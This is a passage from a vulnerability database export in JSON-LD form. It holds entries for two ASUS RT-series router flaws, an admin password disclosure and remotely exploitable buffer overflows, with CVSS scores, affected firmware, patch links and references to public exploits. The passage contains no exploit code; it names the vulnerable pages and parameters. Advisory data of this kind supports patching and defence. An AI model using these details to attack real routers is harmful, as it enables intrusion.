      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "David Longenecker",
        "sources": [
          {
            "db": "BID",
            "id": "66954"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-2719",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2014-2719",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-02538",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 6.3,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 6.8,
                "id": "VHN-70658",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-2719",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-2719",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-02538",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201404-434",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-70658",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. \nASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "BID",
            "id": "66954"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          }
        ],
        "trust": 2.52
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-70658",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-2719",
            "trust": 3.1
          },
          {
            "db": "BID",
            "id": "66954",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538",
            "trust": 0.6
          },
          {
            "db": "FULLDISC",
            "id": "20140416 ASUS RT-XXXX SOHO ROUTERS EXPOSE ADMIN PASSWORD, FIXED IN 3.0.0.4.374.5517",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "126213",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "db": "BID",
            "id": "66954"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "id": "VAR-201404-0636",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          }
        ],
        "trust": 1.3092795819999998
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          }
        ]
      },
      "last_update_date": "2025-04-13T23:05:08.813000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "RT-N66U",
            "trust": 0.8,
            "url": "http://support.asus.com/download.aspx?m=RT-N66U+%28VER.B1%29"
          },
          {
            "title": "Cellspot router firmware update information",
            "trust": 0.8,
            "url": "https://support.t-mobile.com/docs/DOC-21994"
          },
          {
            "title": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Patch for Information Disclosure Vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/45075"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-200",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "http://seclists.org/fulldisclosure/2014/apr/225"
          },
          {
            "trust": 1.7,
            "url": "http://support.asus.com/download.aspx?m=rt-n66u+%28ver.b1%29"
          },
          {
            "trust": 1.7,
            "url": "http://dnlongen.blogspot.com/2014/04/cve-2014-2719-asus-rt-password-disclosure.html"
          },
          {
            "trust": 1.1,
            "url": "https://support.t-mobile.com/docs/doc-21994"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2719"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2719"
          },
          {
            "trust": 0.8,
            "url": "http://dnlongen.blogspot.jp/2014/04/cve-2014-2719-asus-rt-password-disclosure.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.asus.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "db": "BID",
            "id": "66954"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "db": "BID",
            "id": "66954"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-04-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "date": "2014-04-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "date": "2014-04-14T00:00:00",
            "db": "BID",
            "id": "66954"
          },
          {
            "date": "2014-04-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "date": "2014-04-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "date": "2014-04-22T13:06:29.493000",
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-04-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "date": "2016-06-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-70658"
          },
          {
            "date": "2014-04-14T00:00:00",
            "db": "BID",
            "id": "66954"
          },
          {
            "date": "2016-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002210"
          },
          {
            "date": "2014-04-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-2719"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Information Disclosure Vulnerability",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-02538"
          },
          {
            "db": "BID",
            "id": "66954"
          }
        ],
        "trust": 0.9
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "information disclosure",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-434"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0239

    Vulnerability from variot - Updated: 2025-04-11 23:01

    Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. ASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter 'apps_name' and The 'apps_flag' parameter

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0239",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "tm-ac1900",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4..374_979"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4..374_979"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "asus",
            "version": "3.0.0.4..374_979"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374_979"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.374_979"
          },
          {
            "model": "rt-ac66u 3.0.0.4.374 979",
            "scope": null,
            "trust": 0.6,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n56u 3.0.0.4.374 979",
            "scope": null,
            "trust": 0.6,
            "vendor": "asustek computer",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Holcomb",
        "sources": [
          {
            "db": "BID",
            "id": "65046"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2013-6343",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-6343",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-00486",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-66345",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-6343",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-6343",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00486",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201401-417",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-66345",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. \nASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter \u0027apps_name\u0027 and The \u0027apps_flag\u0027 parameter",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "BID",
            "id": "65046"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          }
        ],
        "trust": 2.52
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-66345",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-6343",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "65046",
            "trust": 2.0
          },
          {
            "db": "OSVDB",
            "id": "102267",
            "trust": 1.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "31033",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "124855",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84386",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-61364",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "db": "BID",
            "id": "65046"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "id": "VAR-201401-0239",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          }
        ],
        "trust": 1.41918854
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          }
        ]
      },
      "last_update_date": "2025-04-11T23:01:42.712000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.asus.com/"
          },
          {
            "title": "Cellspot router firmware update information",
            "trust": 0.8,
            "url": "https://support.t-mobile.com/docs/DOC-21994"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.asus.com/jp/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/65046"
          },
          {
            "trust": 1.1,
            "url": "https://support.t-mobile.com/docs/doc-21994"
          },
          {
            "trust": 1.1,
            "url": "http://www.exploit-db.com/exploits/31033"
          },
          {
            "trust": 1.1,
            "url": "http://osvdb.org/102267"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6343"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6343"
          },
          {
            "trust": 0.8,
            "url": "http://infosec42.blogspot.jp/2014/01/exploit-asus-rt-n56u-remote-root-shell.html"
          },
          {
            "trust": 0.6,
            "url": "https://bugs.webkit.org/show_bug.cgi?id=126946"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00486"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66345"
          },
          {
            "db": "BID",
            "id": "65046"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005890"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-417"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6343"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-22T00:00:00",
